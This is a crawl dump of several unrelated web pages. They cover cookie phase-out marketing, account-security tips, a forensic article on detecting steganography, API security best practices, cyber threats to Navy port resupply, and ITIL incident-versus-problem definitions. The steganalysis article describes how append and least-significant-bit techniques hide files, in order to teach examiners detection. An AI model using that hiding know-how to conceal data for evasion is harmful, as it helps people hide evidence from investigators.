- First-party cookies are still on the table: While third-party cookies are on the way out, first-party cookies still collect tons of valuable data to bolster user experience and help advertisers understand their audiences and make educated decisions in their marketing campaigns.
- You can encourage users to share data: Email is still the most significant medium for marketers when it comes to first-party data. Great content and incentives on your website to leverage newsletter signups and website subscriptions remain impactful digital marketing strategies.
- You can leverage your data on advertising platforms: Advertisers can still use their data on advertising platforms like Google Ads and Facebook. For instance, you can still use customer lists to create custom audiences on Facebook or use Google’s Customer Match feature for enhanced conversion optimization.
- Google is still going to track people’s behavior online: While Google is opting out of tracking individual people, the company is heavily invested in tracking groups of people, such as with the tracking system FLoC (Federated Learning of Cohorts).
What Should You Do?
While much attention has been given to this change, it’s essential to keep it in perspective. All your marketing channels – including PPC and other online advertising – remain wide open. You’ll just need to focus more heavily on best practices for generating brand awareness, delivering solid user experiences, and building proprietary lists and audiences. We’ve long known that content (strategy, relevance and substance) will separate marketing winners and losers over the long haul. That trend was accelerated when the pandemic shut down live events. The loss of third-party cookies is just another nudge in that direction. | <urn:uuid:7cf796bb-b22d-40eb-bb18-499565e42454> | CC-MAIN-2022-40 | https://buzztheory.com/googles-phase-out-of-third-party-cookies-explained/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337371.9/warc/CC-MAIN-20221003003804-20221003033804-00002.warc.gz | en | 0.919934 | 1,144 | 2.515625 | 3 |
Use non-obvious answers to security questions
When creating online accounts have you ever been asked for answers to questions such as:
- What was your mum's maiden name?
- What was the first school you attended?
- What is your favourite colour?
These questions are often used to help prove your identity if you forget your password. Unfortunately though many of the answers we're encouraged to give are often trivial to guess or research - gifting hackers with an easy way to break into your account.
Consider how few answers there are to "What is your favourite colour?". Even if a first guess of "red" is wrong it probably wouldn't take too many tries to get it right. And does your public Facebook or LinkedIn profile answer the question "Which university did you attend?".
Strong passwords are worthless if hackers can just use this easy backdoor route.
The email account of the US Presidential Candidate Sarah Palin was hacked this way in 2008, & nude photos of Scarlett Johansson were accessed by this method too.
Instead, to protect yourself just follow this simple rule:
Never provide a direct answer to the question.
If any website asks you these types of questions you could either provide a completely irrelevant answer, or if that's not so easy to remember then answer the question but add something random after it, such as "bathtub". This something can be the same for each account to help you remember it.
Facebook fun? Or a scam?
Do you ever see those Facebook posts that get shared thousands of times -
- "What's your pornstar name? Type the name of your first pet and your favourite colour now!", or
- "Discover your Star Wars character name! Enter the name of your favourite teacher and the name of the street you grew up on."
A bit of harmless fun? Maybe - or maybe not.
Think the questions look familiar? That's because they're often the very same ones that websites use as security questions to reset your password - and you might just be giving the answers away for all to see!
Even fun questionnaires that are just between friends can give information away to fraudsters. When was the last time you reviewed your Facebook privacy settings?
Be careful with what you post on social media - and who can see your posts. Those fun viral posts may not always be quite so fun & innocent after all...
Many websites now use stronger password reset processes, such as emailing a password reset link or texting a security code to your phone, but there are still many sites where a simple question is all that's stopping an attacker from accessing your account.
Make sure you protect yourself from this type of attack!
Your mobile phone
Do you read and send email from your phone? And do you access Facebook, Twitter, and other accounts from it too?
Whilst it's convenient to log straight into these apps without needing a password, if your phone is ever stolen then the thief will also be able to access these too. To help avoid this it's a good idea to do the following:
Add a pin
The best defence is always to require a PIN when unlocking your phone (or fingerprint scanning or facial recognition instead - these are equally good). You can often make this less intrusive by only asking for your PIN if your phone has been left locked for 5 minutes or more.
Enable the "Find my phone" feature
Many modern phones come with a "Find My Phone" feature to help locate it if it's ever lost (for as long as it has power & a phone signal).
This feature also often allows you to remotely delete all data, preventing anyone from accessing whatever you have on your phone.
If you've lost your phone
If you ever lose your phone then you should get to a computer and change the passwords for your different accounts straight away, just in case a thief does manage to access your phone. For more details see our Help! I've lost my phone page.
We have more in-depth advice to looking after your phone on our page here.
Avoid getting locked out
Whilst you're reviewing your security settings, you might also want to check any settings for proving your identity should you ever get locked out.
Most of us forget our passwords every now and then. Normally we can easily regain access by following a simple password reset process, but what if we forget the answers to the security question, or if we don’t have access to our email to get the password reset link?
A little forward planning can help here - see if your favourite websites offer these options:
1) Set up extra contact info:
- Adding contact details, such as a phone number or extra email address, can help you prove your identity if you ever find yourself locked out.
- Remember to review these regularly in case your details change.
2) Trusted Friends:
- Facebook also offers a "Trusted Contacts" feature, where you nominate 3 (or more) friends to prove your identity and help you regain access.
- Don’t worry, Facebook have checks in place to stop cheeky friends from abusing this & getting access to your account without your permission!
3) Recovery codes:
- Recovery codes are effectively a secondary password that you keep securely locked away (in the care of your solicitor for example) and use to reset your main password.
- You must make sure you look after this code and treat it at least as securely as you would any other password.
Take a look in the "Account" or "Security Settings" sections of your favourite websites – see what they recommend and if there’s anything you can set up today.
You might also be interested in what happens to our online accounts when we die. A little forward planning of your digital legacy now can save our loved ones a lot of hassle later on.
How else can I keep my accounts secure?
A good antivirus package on your PC can help prevent some viruses from silently stealing the passwords to our online accounts. You should also keep the software of your computer up to date too, and never open any email attachments that you're not expecting.
BeCyberSafe.com have a lot of practical information about how to protect your computer from viruses - it's definitely worth a read.
Enabling activity notifictions
Many websites have the ability to send you an alert if they ever detect any suspicious activity, such as if someone tries to log into your account from a new device or tries to change your password.
Knowing that someone is trying to access your account will serve as an immediate call to check all your security settings & to perhaps change your password. Search the help section for "activity notifications" on your favourite websites for how to enable this. | <urn:uuid:0fefe7ae-6e66-46b0-ad4d-aabd13bd3cad> | CC-MAIN-2022-40 | https://www.becybersafe.com/passwords/account-security.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337490.6/warc/CC-MAIN-20221004085909-20221004115909-00002.warc.gz | en | 0.948837 | 1,384 | 2.75 | 3 |
First published August 2005
by James E. Wingate, CISSP-ISSEP, CISM, IAM
Director, Steganography Analysis & Research Center
Chad W. Davis
Computer Security Engineer
Rapidly evolving computer and networking technology coupled with a dramatic expansion in communications and information exchange capability within government organizations, public and private corporations and even our own homes has made our world smaller. As a society, we are substantially more invested in information technologies than ever before. Use of the Internet and multimedia technologies for communication have become commonplace and have become an integral part of both business and social activity. This has changed how societies across the globe operate.
The rapid evolution of the Internet has also been somewhat of a “double-edged sword.” Not only has it provided a medium for exchanging vast amounts of information and knowledge for the benefit of mankind it has also provided a new medium for conducting activities detrimental to mankind. No longer confined to the bounds of physical space, criminals, including terrorists, have discovered a virtual world where they can take advantage of the vast expanse of cyber space to conceal their activities from the prying eyes of law enforcement and the intelligence community. In the pre-Internet era, criminals often operated under the cloak of darkness. Now they operate 24×7 under the cloak of cyber space—with little concern for being detected, arrested, prosecuted and convicted because by and large much criminal activity goes unreported. Even when it is reported, law enforcement is already so overwhelmed with CP investigations they don’t have the time or resources to investigate other cyber crimes. This fact is not lost on those who would use the Internet for illegal or otherwise nefarious purposes.
To make matters worse, criminals are adapting to evolving law enforcement technologies in the field of computer forensics by finding new ways to conceal their criminal activities. Law enforcement forensic examiners are beginning to discover data hiding applications on seized media that have been used to evade detection by popular computer forensic tools by hiding a digital file inside of another digital file. This technique is called digital steganography.
Steganography, literally meaning “covered writing,” is a means of covert communication that encompasses a variety of techniques used to embed data within a cover medium in such a manner that the very existence of the embedded information is undetectable.
Hundreds of steganography applications are readily available on the Internet, and most of those are available as freeware or shareware, for use by criminals and terrorists. Computer security, law enforcement, and intelligence professionals need the capability to both detect the use of digital steganography applications to hide information and then extract the hidden information. Accordingly, there is much current interest in steganalysis, or the detection and extraction of information hidden with digital steganography applications.
There are two major schools of thought for conducting steganalysis: one of which involves an approach known as “blind detection” and the other is a more analytical approach. This document will describe both techniques and how they can be employed together to conduct steganalysis.
The Blind Detection Approach to Steganalysis
The blind detection approach to steganalysis has been around for a number of years. Blind detection attempts to determine if a message may be hidden in a file without any prior knowledge of the specific steganography application used to hide the information. Several techniques may be employed to inspect suspect files including various visual, structural, and statistical methods. Visual analysis methods attempt to detect the presence of steganography through visual inspection, either with the naked eye or with the assistance of automated processes. Visual inspection with the naked eye can succeed when steganography is inserted in relatively smooth areas with nearly equal pixel values. Automated computer processes can, for example, decompose an image into its individual bit-planes. A bit-plane consists of a single bit of memory for each pixel in an image, and is a typical storage place for information hidden by steganography applications. Any unusual appearance in the display of the least significant bit-plane would be expected to indicate the existence of steganography.
Structural analysis methods attempt to reveal alterations in the format of the data file. For example, a steganography application may append hidden information past an image’s end-of-file marker. An image that has been modified using this appending technique is interpreted by the operating system just as if it were the original carrier file. The two files are visually and digitally identical, because the image’s data bits have not been altered. The hidden information that is embedded past the end-of-file marker is simply ignored by the operating system. Several automated methods for conducting structural analysis have been developed in addition to the manual process of investigating images with a hex editor.
Statistical analysis methods attempt to detect tiny alterations in a file’s statistical behavior caused by steganographic embedding. Statistical analysis of files can be difficult and time consuming, since there are a variety of approaches to embedding—each modifying the carrier file in a different way. Therefore, unified techniques for detecting steganography using this method are difficult to find. Determining statistics such as means, variances, and chi-square tests can measure the amount of redundant information and/or deviation from the expected file characteristic. Current research in blind detection steganalysis is focused on these statistical methods.
Complications of Blind Detection
In practice, even if the blind detection technique detects anomalies in suspect files, it is not very likely that the hidden information can successfully be extracted. The suspect file may have characteristics similar to an anomaly that will trigger a false positive result. It is also important to keep in mind that even if it is possible to extract the hidden information, it may have been encrypted prior to being hidden in the carrier file. In that case, the hidden information extracted from the carrier file, if that is even possible, will be in the form of cipher text which may not be decipherable if a very strong encryption algorithm was used.
The following four complications are possible when implementing blind detection techniques for steganalysis:
1. The suspect file may or may not have any information hidden in it in the first place.
2. The hidden message may have been encrypted before being hidden in the carrier file.
3. Some suspect files may have had noise or irrelevant data encoded in them which reduces the stealth aspect (i.e., makes it easier to detect use of steganography) but makes analysis very time-consuming.
4. Unless the hidden information can be found, completely recovered, and decrypted (if encrypted), it is often not possible to be sure whether the suspect carrier file contained a hidden message in the first place—all you end up with is a probability that the suspect carrier file may have something hidden within it.
The Analytical Approach to Steganalysis
The analytical approach to steganalysis has been developed within the Steganography Analysis and Research Center (SARC) as a product of extensive research of steganography applications and the techniques they employ to embed hidden information within files.
The premise of this approach is to first determine if any residual file and/or Windows Registry® artifacts from a particular steganography application exist on the suspect media.
– If residual artifacts exist, then the application was probably installed
– If the application was installed, then it was probably used
– If the application was used, then it was used to hide something
And that is exactly what the computer forensics examiner must try to determine. What information was hidden? That may be the key to the investigation that resulted in the computer seizure in the first place.
The analytical approach attempts to determine if there is any evidence that a steganography application ever existed on the suspect media. Searching for files and registry entries that have been identified by the SARC as belonging to a steganography application will identify these residual artifacts.
The goal is to determine which steganography application was used. Determining the application used will shed light on the embedding technique employed by the application and the file types used by the application as carrier files. Armed with that knowledge, the examiner can then focus their efforts on detailed analysis of suspect carrier files and attempt to extract information that may have been hidden in those files.
Process for Analytical Steganalysis
The analytical approach to steganalysis is intended to be an extension of traditional digital forensics methods. For example, traditional methods should be employed to recover all files that may have been deleted prior to beginning the steganalysis aspect of the examination.
Determining Residual File Artifacts
To determine if residual file artifacts of steganography applications exist on the suspect media, the SARC has developed the Steganography Application Fingerprint Database (SAFDB). The SAFDB contains hash values for nearly 15,000 file profiles associated with 230 steganography, watermarking, and other data-hiding applications. The file profiles contain identifying information such as filename, associated application name, and four unique hash values: CRC-32, MD5, SHA-1, and SHA-256. These hash values may be used to determine the presence of a steganography application or artifact of a steganography application on the media being examined.
For a limited time, the SAFDB is available at no charge to authorized law enforcement and intelligence community examiners on the SARC website at www.sarc-wv.com. The database is available in formats compatible with most popular forensic tools: EnCase, FTK, HashKeeper, ILook, and ProDiscover. For additional information on SAFDB, please contact the SARC to request the free White Paper on “The Steganography Application Fingerprint Database.”
The first step in the analytical approach is to hash all files on the suspect media. Next, the hash values are compared with the hash values in SAFDB. A match represents a file artifact that may be associated with one or more steganography applications. Each file profile within the SAFDB identifies which steganography application that artifact belongs to.
Determining Residual Registry Artifacts
In addition to the hash values of files associated with steganography applications, the SAFDB also contains a set of registry keys and values known to be created or modified as a result of installing a steganography application. This aspect of the analytical approach is not unlike searching for latent fingerprints at a crime scene. Some criminals go to great lengths to cover their tracks by wearing gloves and/or cleaning up a crime scene. Likewise, some cyber criminals will go to great lengths to cover their tracks. After using a steganography application, they may uninstall the application and then delete obvious folders and files associated with the application that weren’t removed by the uninstall operation.
The registry keys and values can be compared to the registry from the suspect computer to determine if a steganography application currently exists, or did exist at one time, on the system. A positive match could lead the investigator to confirm with a high degree of confidence that a particular steganography application has existed on a suspect system.
It is entirely conceivable that a single registry key or value could be the sole fingerprint left behind that could become the key to finding and extracting information hidden with a steganography application deleted from the system after it was used.
Conducting Analytical Steganalysis
After determining which steganography application(s) may have been used, carrier file types that can be manipulated by those applications should be identified. To determine the potential carrier file types for a steganography application, the examiner should download and experiment with that application. The SARC maintains a physical repository of each steganography application that exists in the SAFDB and may be contacted for assistance if the examiner cannot locate a particular steganography application on the Internet. Copies of commercially licensed versions of steganography applications cannot be provided.
Next, a focused search should be conducted on the suspect media for carrier file types that are manipulated by the particular steganography application. Finally, the suspect carrier files can be subjected to further analysis based on the specific steganographic techniques that can be used on them.
After determining which steganography technique was employed by the application detected on the suspect media, efforts to extract information hidden with that application can begin. Again, if strong encryption was used prior to hiding the information in the carrier file, then complex cryptanalysis may be necessary to translate the extracted cipher text back into plain text.
Some steganography applications leave behind signatures, specific byte patterns that always appear in a file after hidden information has been embedded. Signature-based steganalysis can be very time consuming because the signature for a specific steganography application must first be identified from a large sample of files that have been embedded using it. In addition, automated processes must be employed to search every potential carrier file for that particular signature.
An automated artifact detection tool, StegAlyzerAS (Steganography Analyzer Artifact Scanner), has been developed to detect file and registry artifact matches with SAFDB.
An automated signature-based detection tool that uses a proprietary steganography application signature database, StegAlyzerSS (Steganography Analyzer Signature Scanner), has also been developed.
These products were designed and developed to alleviate the very complex and time consuming efforts that a computer forensics examiner must endure during an investigation involving steganography.
In addition to the StegAlyzer products, computer forensic examiners can also contact the SARC for technical assistance when steganography is detected during an examination of suspect media.
Carrier File Types and Steganographic Techniques
The following sections will demonstrate commonly used steganographic techniques for different carrier file formats. Examples will be given for each file type and steganographic technique, including methods for detecting and extracting hidden information embedded using each technique.
All Files – The Append Technique
A commonly used steganographic technique that can be applied to any type of file is the appending method. This method appends the hidden information past the file’s end-of-file marker. The hidden information can be encrypted, compressed within a zip file, or left in plaintext. The appended information may also contain a signature for the steganography application that embedded it, the size of the hidden information, or the size of the original carrier file.
To illustrate the append steganographic technique, consider the following JPG image: baboon.jpg.
The JPG image format dictates that the byte sequence FF D9 indicates the end of the file. This can be seen by opening the file in a hex editor.
Hex editor view of baboon.jpg
A steganography application that uses the appending technique is used to hide a text file containing the Declaration of Independence in the baboon image. This particular application compresses the Declaration of Independence file into a standard zip file and appends it past the FF D9 end of image marker for JPG images. The ZIP file format dictates that the byte sequence 50 4B indicates the beginning of the file. This can also be seen with a hex editor.
Hex editor view of baboon.jpg with embedded Declaration of Independence.txt
This particular steganography application also embeds additional data used for decoding the hidden information. This data includes signature bytes that the steganography application uses to identify that the hidden information was embedded by itself (denoted by the red box in the diagram below), and a hash value representation of the user’s specified password (denoted by the green box).
Hex editor view of information appended by the steganography application
Extracting hidden information that has been embedded using the append steganographic technique involves identifying the end-of-file bytes of the original file and the hidden information that follows. Using a hex editor, the first step in extraction is to remove all of the original carrier file’s bytes. The bytes that remain contain the hidden information. The hidden information may be readable plaintext, encrypted, or compressed. If the hidden information is encrypted by a strong cipher, it may be difficult or even impossible to retrieve the deciphered hidden data. If the hidden information is compressed within a compressed ZIP file, the byte sequence 50 4B will denote its first two bytes. To recover the decompressed hidden data, first recover all bytes corresponding to the ZIP file and save them as a separate file. Try to extract the compressed file using WinZip or another decompression tool.
The SARC has developed in-house tools for extracting information embedded by the append steganographic technique. If you are interested in steganalysis services, please contact the SARC at (304) 366-9161 or [email protected] for further details.
BMP – The Least Significant Bit Technique
A commonly used steganographic technique that can be applied to BMP graphic files is the Least Significant Bit (LSB) method. As its name implies, the LSB method replaces the least significant bit in the data bytes of the image to embed the hidden information. These bit changes do not cause significant quality degradation in the image, especially for 24-bit BMP files. Sometimes, a steganography application can use the least two significant bits in the bytes to embed the hidden information.
To illustrate the LSB steganographic technique, consider the following BMP image: house.bmp.
The LSB steganographic technique encodes messages in the least significant bit of every byte in an image. By doing so, the value of each pixel is changed slightly, but not enough to make significant visual changes to the image, even when compared to the original. Comparing the original carrier file with the same file that has been manipulated by the LSB technique in a hex editor shows a variance in some byte values. Notice in the figure below that the highlighted byte values differ in value by one.
Hex editor comparison
house.bmp (without steganography)
house.bmp (with steganography)
This manual inspection of files is not practical in most digital forensics investigations, since it is not likely that both a clean carrier file will exist along with the carrier file with steganography embedded within it. A more effective approach to LSB analysis is to conduct LSB enhancement. This technique “enhances” image pixel bytes by setting the value of all bits within each byte to the value of the least significant bit. For example, consider the byte 4B. The bitwise representation of 4B is 01001011. LSB enhancement sets all bits to 1, the value of the least significant bit. The resulting byte value of FF replaces the original byte value of 4B.
The images below are LSB enhancements of the house image. Notice that the image containing steganography has a lattice pattern at the bottom. This pattern is a telltale sign that ASCII text has been embedded using the LSB technique.
Enhanced house.bmp (without steganography)
Enhanced house.bmp (with steganography)
The LSB steganographic technique can also be implemented to modify any number of least significant bits. For example, an application may modify the least two significant bits to hide information. The greater the number of bits an application modifies, the greater the reduction of picture quality and chance for visual attack.
Extracting hidden information that has been embedded using the LSB technique involves determining the number of bits used for encoding. After extracting the encoding bits, they must be reassembled to create the hidden information. Some steganography applications employ various randomization techniques for reassembling the encoded bits. For straightforward embedding, simply reconstruct eight bits into each byte of the hidden data.
Criminals have always sought ways to conceal their activity in real, or physical, space. The same is true in virtual, or cyber space. Digital steganography represents a particularly significant threat today because of the large number of digital steganography applications freely available on the Internet that can be used to hide any digital file inside of another digital file. Use of these applications, which are both easy to obtain and simple to use, allows criminals to conceal their activities in cyber space.
Thus, steganography presents a significant challenge to law enforcement as well as the intelligence community because detecting hidden information and then extracting that information is very difficult and may be impossible in some cases.
By providing a national repository of steganography application hash values, or fingerprints, and developing tools, techniques, and procedures to detect fingerprints and signatures on suspect media and then find and extract hidden information, the SARC is rapidly evolving into a high-value law enforcement, homeland security, and national security asset in the global war on terrorism and efforts to combat cyber crime.
James E. Wingate, CISSP-ISSEP, CISM, IAM
Director, Steganography Analysis & Research Center
Vice President for West Virginia Operations
320 Adams Street, Suite 105
Fairmont, WV 26554
Office: 304.366.9161 Fax: 304.366.9163
Chad W. Davis
Computer Security Engineer
320 Adams Street, Suite 105
Fairmont, WV 26554
Steganography Analysis and Research Center | <urn:uuid:c730f006-5a08-4269-afe4-65491796b22d> | CC-MAIN-2022-40 | https://www.forensicfocus.com/articles/an-analytical-approach-to-steganalysis/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337490.6/warc/CC-MAIN-20221004085909-20221004115909-00002.warc.gz | en | 0.906129 | 4,502 | 2.578125 | 3 |
API security should never be taken for granted. With the increasing demand for data-centric projects, companies have quickly opened up to their ecosystem through SOAP or REST APIs.
Application Programming Interfaces (or APIs for short) are the doors to closely guarded data of a company. They’re extremely useful because they allow two different applications to communicate.
On the surface, this is great because they make life much easier for developers, but at the same time, it creates the following challenge: How can we keep the doors open for the API ecosystem and sealed off from hackers at the same time?
There are ways you can do it and strategies that you can employ to reap the benefits that APIs offer while keeping all of your data safe. So, let’s go over some API security best practices. Here are 12 simple tips to avoid security risks and secure your APIs.
Be cryptic. Nothing should be in the clear for internal or external communications. Encryption will convert your information into code. This will make it much more difficult for sensitive data to end up in the wrong hands.
You and your partners should cipher all exchanges with TLS (the successor to SSL), whether it is one-way encryption (standard one-way TLS) or, even better, mutual encryption (two-way TLS).
Use the latest TLS versions to block the usage of the weakest cipher suites.
Don’t talk to strangers. In simple terms, authenticity is real. It means something (or someone) is who they say they are. In the digital world, authentication is the process of verifying a user’s identity. It essentially pulls off the mask of anyone who wants to see your information.
So, you should always know who is calling your APIs. There are several methods to authenticate:
- HTTP Basic authentication where a user needs to provide user ID and password
- API key where a user needs to a unique identifier configured for each API and known to API Gateway
- A token that is generated by an Identity Provider (IdP) server. OAuth 2 is the most popular protocol that supports this method.
At the very least you should use an API key (asymmetric key) or basic access authentication (user/password) to increase the difficulty of hacking your system. But you should consider using OAuth 2 as your protocol of choice for a robust security of your APIs.
3. OAuth & OpenID Connect
Delegate all responsibilities. A good manager delegates responsibility, and so does a great API. You should be delegating authorization and/or authentication of your APIs to third party Identity Providers (IdP).
What is OAuth 2? It is a magical mechanism preventing you from having to remember ten thousand passwords. Instead of creating an account on every website, you can connect through another provider’s credentials, for example, Facebook or Google.
It works the same way for APIs: the API provider relies on a third-party server to manage authorizations. The consumer doesn’t input their credentials but instead gives a token provided by the third-party server. It protects the consumer as they don’t disclose their credentials, and the API provider doesn’t need to care about protecting authorization data, as it only receives tokens.
OAuth is a commonly used delegation protocol to convey authorizations. To secure your APIs even further and add authentication, you can add an identity layer on top of it: this is the Open Id Connect standard, extending OAuth 2.0 with ID tokens.
4. Call security experts
Don’t be afraid to ask for (or use) some help. Call in some security experts. Use experienced Antivirus systems or ICAP (Internet Content Adaptation Protocol) servers to help you with scanning payload of your APIs. It will help you to prevent any malicious code or data affecting your systems.
There are several security APIs you can use to protect your data. They can do things like:
- Integrate two-factor authentication
- Create passwordless login, or time-based one-time passwords
- Send out push alerts if there’s a breach
- Protect against viruses and malware
- Prevent fraud
- Let you know if a password is a known password used by hackers
- Add threat intelligence
- Provide security monitoring
The best part is that some of these antivirus systems are free to use. Others offer monthly plans. Premium plans will provide more protection, but you can decide for yourself the type of security you need.
5. Monitoring: audit, log, and version
Be a stalker. Continually monitoring your API and what it’s up to can pay off. Be vigilant like that overprotective parent who wants to know everything about the people around their son or daughter.
How do you do this? You need to be ready to troubleshoot in case of error. You’ll want to audit and log relevant information on the server — and keep that history as long as it is reasonable in terms of capacity for your production servers.
Turn your logs into resources for debugging in case of any incidents. Keeping a thorough record will help you keep track and make anything that’s suspicious more noticeable.
Also, monitoring dashboards are highly recommended tools to track your API consumption.
Do not forget to add the version on all APIs, preferably in the path of the API, to offer several APIs of different versions working and to retire and depreciate one version over the other.
6. Share as little as possible
Be paranoid. It’s OK to be overly cautious. Remember, it’s vital to protect your data.
Display as little information as possible in your answers, especially in error messages. Lock down email subjects and content to predefined messages that can’t be customized. Because IP addresses can give locations, keep them for yourself.
Use IP Whitelist and IP Blacklist, if possible, to restrict access to your resources. Limit the number of administrators, separate access into different roles, and hide sensitive information in all your interfaces.
7. System protection with throttling and quotas
Throttle yourself. You should restrict access to your system to a limited number of messages per second to protect your backend system bandwidth according to your servers’ capacity. Less is more.
You should also restrict access by API and by the user (or application) to ensure that no one will abuse the system or anyone API in particular.
Throttling limits and quotas – when well set – are crucial to prevent attacks coming from different sources flooding your system with multiple requests (DDOS – Distributed Denial of Service Attack). A DDOS can lock legitimate users out of their own network resources.
8. Data validation
Be picky and refuse surprise gifts, especially if they are significantly large. You should check everything your server accepts. Be careful to reject any added content or data that is too big, and always check the content that consumers are sending you. Use JSON or XML schema validation and check that your parameters are what they should be (string, integer…) to prevent any SQL injection or XML bomb.
Network and be up to date. A good API should lean on a good security network, infrastructure, and up-to-date software (for servers, load balancers) to be solid and always benefit from the latest security fixes.
10. OWASP Top 10
Avoid wasps. The OWASP (Open Web Application Security Project) Top 10 is a list of the ten worst vulnerabilities, ranked according to their exploitability and impact. In addition to the above points, to review your system, ensure you have secured all OWASP vulnerabilities.
11. API firewalling
Build a wall. For some people, building a wall can solve all the immigration problems. This is the case, for APIs at least! Your API security should be organized into two layers:
- The first layer is in DMZ, with an API firewall to execute basic security mechanisms like checking the message size, SQL injections, and any security based on the HTTP layer, blocking intruders early. Then forward the message to the second layer.
- The second layer is in LAN with advanced security mechanisms on data content.
The more challenging you make it for cyber attackers to get at your information, the better.
12. API Gateway (API Management)
Gateway to heaven. All the above mechanisms are long to implement and maintain. Instead of reinventing the wheel, you should opt for a mature and high-performing API Management solution with all these options to save your money, time, and resources and increase your time to market. An API Gateway will help you secure, control, and monitor your traffic.
In addition to helping you secure your APIs easily, an API Management solution will help you make sense of your API data to make technical and business decisions: the key to success!
Now you know more about the basic mechanisms to protect your APIs! Have fun securing your APIs, hopefully with a great API Management solution.
Don’t take API security for granted
It’s unfortunate, but internet threats abound, and hackers are relentless. Implementing a solid API security plan is critical to protecting your information. Crucially, the ultimate best practice is to build API security into the general mindset and process of how APIs are designed and developed.
Axway’s Amplify API Management Platform makes it easier than ever to secure your digital experiences. It not only monitors and protects your API, but you’ll also have all of the information you need in one place. It’s visible and easy to read. You’ll never be vulnerable to cyber attacks, allowing you to focus on what you need to get done.
And if you combine the right technology with a more deliberate process, building security into the design process from the start, you can uncover and address security threats before they arise.
Learn more about how an open platform fortifies security in a world of rapidly evolving cyberattacks. | <urn:uuid:20583286-982d-406a-b8d9-4148ac2fdb00> | CC-MAIN-2022-40 | https://blog.axway.com/learning-center/digital-security/keys-oauth/api-security-best-practices?utm_source=axway&utm_medium=blog&utm_campaign=gc_open_banking&utm_term=null&utm_content=blog&utm_id=null | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337906.7/warc/CC-MAIN-20221007014029-20221007044029-00002.warc.gz | en | 0.910612 | 2,076 | 2.53125 | 3 |
As large-scale cyber attacks by China and Russia on American government agencies and corporations have demonstrated, it can be difficult to prevent nation-states from planting malware on sensitive networks—even those with strict access controls. It can also be difficult to know that it has happened. Suspected Russian hackers in the SolarWinds supply-chain attack remained undetected on networks for as long as 9 months before they were discovered.
This kind of vulnerability has significant implications for Navy cybersecurity, including at ports in the Pacific where replenishment ships take on supplies. One of the risks is that an adversary could plant malware on port computer systems and then activate it at a critical moment, crippling resupply operations. This might unfold, for example, if a naval confrontation between the U.S. and an adversary in the U.S. Indo-Pacific Command Area of Responsibility (INDOPACOM AOR) seemed imminent, and the Navy wanted to top off fuel, munitions, and other supplies on combatant ships for maximum mobility and flexibility.
It wouldn’t be necessary for the malware to infect and disable every supply-related computer system in a port—a single attack anywhere along the line could disrupt the entire resupply operation. For example, malware could disable the pumps that transfer fuel to the replenishment ships, or the cranes that load palletized munitions and other supplies. Malware could freeze the inventory-control systems that dictate which supplies go on which ships, or it could cut the power in critical places.
Ports around the world are being increasingly targeted by hackers. Cyber attacks on the maritime industry’s operational technology (OT) systems have grown by at least 900% over the last 3 years, with some port operations being knocked out for days or even weeks, according to the maritime cybersecurity company Naval Dome.
Current cybersecurity measures at Navy-controlled and commercial ports tend to focus on identity and access management, dictating who has access to which systems. While that is critical, it is not enough. Nation-states like China and Russia are increasingly adept at bypassing identity and access controls in sensitive networks—such as with last year’s SolarWinds attack, which came through a routine software update to thousands of customers, including in parts of the Pentagon and other federal agencies. China is accused of an even more massive attack on U.S. government and business organizations this year, in which hackers exploited vulnerabilities in a Microsoft email service to plant hidden malware.
While such attacks have proven hard to prevent, the Navy can take specific steps to strengthen cybersecurity at Navy-controlled and commercial ports in the Pacific and elsewhere. There is no silver bullet, however. Defending ports against sophisticated cyber attacks calls for a multifaceted approach—one that combines traditional methods, such as redundancy and manual backups, with advanced technologies such as artificial intelligence (AI)-enabled threat detection. Such an approach focuses not just on protecting the IT and OT systems in ports from malware intrusion, but on keeping them resilient in the face of a successful breach. | <urn:uuid:26f8dd4e-d593-4975-8ea0-4fc6b4dcff0b> | CC-MAIN-2022-40 | https://www.boozallen.com/markets/defense/indo-pacific/cyberattacks-on-navy-port-supply-operations.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337906.7/warc/CC-MAIN-20221007014029-20221007044029-00002.warc.gz | en | 0.958206 | 616 | 2.578125 | 3 |
How an ITIL differentiates an Incident and a Problem
An ITIL concept which many of us find is difficult to understand, is how to differentiate an incident from a problem. Incident management and Problem management are part of the fourth stage of ITIL lifecycle – Service Operation, which is accountable for an organization’s Business-as-usual (BAU) activities.
What is an Incident?
An incident is an unplanned event that causes or may cause discontinuity or interruption to the service delivery or quality. It can be a single and a unique issue impacting a single customer or similar issue impacting number of customers. Depending upon the criticality of the issue an incident needs to be resolved to limit its impact.
A planned outage or scheduled maintenance service is not an incident. But if it exceeds the planned schedule time, then it becomes an incident.
Objective of Incident management:
An incident management is a group (Service desk, Technical support, hardware/support team) responsible for resolving an incident as quickly as possible so that the agreed service level agreements (SLA) are met. If unable to resolve the issue permanently they provide a temporary fix or a workaround.
What is a Problem?
An incident can raise a problem, if it is happens again and again. According to ITIL, an incident is changed to problem to perform root cause analysis. A problem though not an incident, but may cause an incident, if not resolved. It is much more serious than an Incident and needs to be analyzed and followed up separately.
A problem can be raised and linked to a single or number of incidents for the root cause. A problem becomes a ‘known error’ once its cause has been identified.
Objective of Problem management
Problem management supports the incident management by doing a root cause analysis of an issue and take necessary steps to ensure that the issue doesn’t occur in the future.
Incident Vs Problem
ITIL encourages an organization to distinguish between an incident and a problem because they are handled, responded and resolved differently. An incident can be a temporary fix, but solution to the problem is a permanent fix.
To differentiate this further, let us take an example:
Suppose there is a telephonic conversation going on between you and your friend. All of a sudden the call is dropped due to no coverage. This results in an incident as it has disrupted the service. You fix this either by restarting your phone or trouble shooting all available options. Once the conversation starts again, the incident is closed. But now, if the issue occurs again, you have a problem. To fix this problem, you need to either call the mobile service provider for the disrupted service due to low network signal or need to change the mobile phone.
An effective Incident management of an organization ensures that all the interrupted services are handled, responded and restored as per the agreed SLA timeframe. On the other hand, an effective problem management of an organization actively responds to the incident so that they don’t reoccur. There are significantly more processes and resources involved and take a bit more time to fix the issue permanently. | <urn:uuid:4de8811e-f26d-4179-9cf0-f153e7b8ace6> | CC-MAIN-2022-40 | https://www.greycampus.com/blog/it-service-management/how-an-itil-differentiates-an-incident-and-a-problem | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00202.warc.gz | en | 0.946773 | 652 | 2.59375 | 3 |
